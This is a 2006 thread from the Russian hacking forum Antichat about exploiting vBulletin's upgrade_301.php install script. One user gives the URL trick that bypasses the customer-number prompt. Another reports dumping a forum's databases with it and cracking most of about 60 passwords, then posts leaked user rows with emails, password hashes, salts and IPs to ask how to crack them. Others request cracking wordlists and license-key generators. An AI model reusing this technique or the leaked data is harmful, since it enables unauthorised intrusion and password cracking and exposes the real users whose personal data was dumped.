ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.09.2006, 17:03
Аватар для firemen
firemen
Новичок
Регистрация: 03.06.2006
Сообщений: 22
Провел на форуме:
79448

Репутация: 1
По умолчанию

Я понял, спасибо.
PasswordPro и вперёд.
Один только вопрос - где можно качнуть нормальный словарь для перебора?
 
Ответить с цитированием

  #12  
Старый 12.09.2006, 17:10
Аватар для r0
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310

Репутация: 488
По умолчанию

https://forum.antichat.ru/thread13640.html
 
Ответить с цитированием

  #13  
Старый 13.09.2006, 14:36
Аватар для CyberPunk
CyberPunk
Участник форума
Регистрация: 25.05.2006
Сообщений: 130
Провел на форуме:
853585

Репутация: 97
По умолчанию

При заходе на http://site/forum/install/upgrade_301.php?step=hello

Пишет
Please Enter Your Customer Number
//поле для ввода
This is the number with which you log in to the vBulletin.com Members' Area

Где можно узнать этот номер? Или дайте пару валидных примеров номеров или генератор plz

Последний раз редактировалось CyberPunk; 15.09.2006 в 21:17..
 
Ответить с цитированием

Пробуй так
  #14  
Старый 18.09.2006, 15:19
Аватар для bestolo4
bestolo4
Новичок
Регистрация: 14.09.2006
Сообщений: 1
Провел на форуме:
5822

Репутация: 0
Smile Пробуй так

Цитата:
Сообщение от CyberPunk  
При заходе на http://site/forum/install/upgrade_301.php?step=hello

Пишет
Please Enter Your Customer Number
//поле для ввода
This is the number with which you log in to the vBulletin.com Members' Area

Где можно узнать этот номер? Или дайте пару валидных примеров номеров или генератор plz
Пробуй ссылку http://target.com/forum_path/install/upgrade_301.php?step=SomeWord
У меня все получилось
 
Ответить с цитированием

  #15  
Старый 18.09.2006, 15:24
Аватар для CyberPunk
CyberPunk
Участник форума
Регистрация: 25.05.2006
Сообщений: 130
Провел на форуме:
853585

Репутация: 97
По умолчанию

Дык я то же самое делал. Только вместо someword я фтыкал hello
 
Ответить с цитированием

  #16  
Старый 18.09.2006, 17:03
Аватар для Thrasher
Thrasher
Новичок
Регистрация: 11.03.2005
Сообщений: 15
Провел на форуме:
149484

Репутация: 1
По умолчанию

Цитата:
Сообщение от CyberPunk  
При заходе на http://site/forum/install/upgrade_301.php?step=hello

Пишет
Please Enter Your Customer Number
//поле для ввода
This is the number with which you log in to the vBulletin.com Members' Area

Где можно узнать этот номер? Или дайте пару валидных примеров номеров или генератор plz
Такая надпись появляется, если форум лицензионный. Нужно вводить регистрационный код форума. Когда форум зануленный, такой надписи нет.
 
Ответить с цитированием

  #17  
Старый 10.10.2006, 10:50
Аватар для fen
fen
Познающий
Регистрация: 23.09.2006
Сообщений: 45
Провел на форуме:
308259

Репутация: 20
Отправить сообщение для fen с помощью ICQ
По умолчанию

в Vbulletin 3.5.4 воспользовался багой upgrade_301.php, снял дамп всех баз данных форума...Там было зарегино окола 60 юзеров.. я расшифровал больше половины паролей.. но затем наткнулся на следущие строчки в базе...
Код HTML:
INSERT INTO user VALUES('35','2','','0','vasya','46ba51cfaa62730ff639deeb40cf9307','2006-09-19','vasya@mail.ru','0','','','','','','','','1','0','Новичок','0','1158679407','0','1159311941','1159828322','1159828309','1','10','5','2','1','0','0','0','3783','','0000-00-00','-1','1','10.10.2.16','0','0','0','0','-1','0','0','\'aD');
INSERT INTO user VALUES('67','2','','0','jon','151b39dbb6ec6bce57b7913dbac76e62','2006-10-03','d45@drem.net','0','','','','','','','','1','0','Новичок','0','1159848049','0','1159848049','1159848255','0','0','10','5','2','1','0','0','0','3143','','0000-00-00','-1','-1','10.10.2.99','0','1','0','0','-1','0','0','\">#');
INSERT INTO user VALUES('63','2','','0','Marina','c19808794095218b7e8e61b99cd02c3a','2006-10-02','mar066@mail.ru','0','','','','','','','','1','0','Новичок','0','1159816716','0','1159816716','1159817189','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.8.67','0','1','0','0','-1','0','0','\\LM');
INSERT INTO user VALUES('26','2','','0','dimom','346a5ee3fb557b5dc4a2b1f1866f3c7b','2006-09-18','qwe02@mail.ru','0','','','','','','','','1','0','Новичок','0','1158603259','0','1158603687','1159811676','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.3.33','0','1','0','0','-1','0','0',')*V');
у юзера vasya стоит '\'aD', вот тут я и непонял, соль в Vbulletin 3.5.4 вроде состоит из 3 символов: salt char(3) NOT NULL... и у остальных трёх юзеров соль состоит из 4 символов.. ..подскажите кто может в 4 строчках - где тут соль...
 
Ответить с цитированием

  #18  
Старый 10.10.2006, 12:45
Аватар для Thrasher
Thrasher
Новичок
Регистрация: 11.03.2005
Сообщений: 15
Провел на форуме:
149484

Репутация: 1
По умолчанию

Так это и есть 3 символа. \ - это экранирующий слэш.
 
Ответить с цитированием

  #19  
Старый 10.10.2006, 20:16
Аватар для CyberPunk
CyberPunk
Участник форума
Регистрация: 25.05.2006
Сообщений: 130
Провел на форуме:
853585

Репутация: 97
По умолчанию

И какая тогда будет соль например тут '\'aD'?
 
Ответить с цитированием

  #20  
Старый 10.10.2006, 21:35
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Символ "\" добавляется для того чтобы следующий за ним символ не мог нарушить работу скрипта. Символ ' это может. Поэтому там слэш. Если бы было иначе - скрипт бы обрабатывался так: salt '\'

Отмодерьте кто нить пост https://forum.antichat.ru/showpost.php?p=192363&postcount=9
а то топик на 5км по горизонтали прокручивать приходиться.
__________________
Full DNS report
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Вопрос про Vbulletin. Utochka Болталка 1 28.06.2006 20:25
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про бан в форуме Vbulletin Форумы 2 25.09.2004 19:59
Вопрос про уязвимости в Vbulletin version 2.2.7 mynhauzen Форумы 3 04.08.2004 12:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ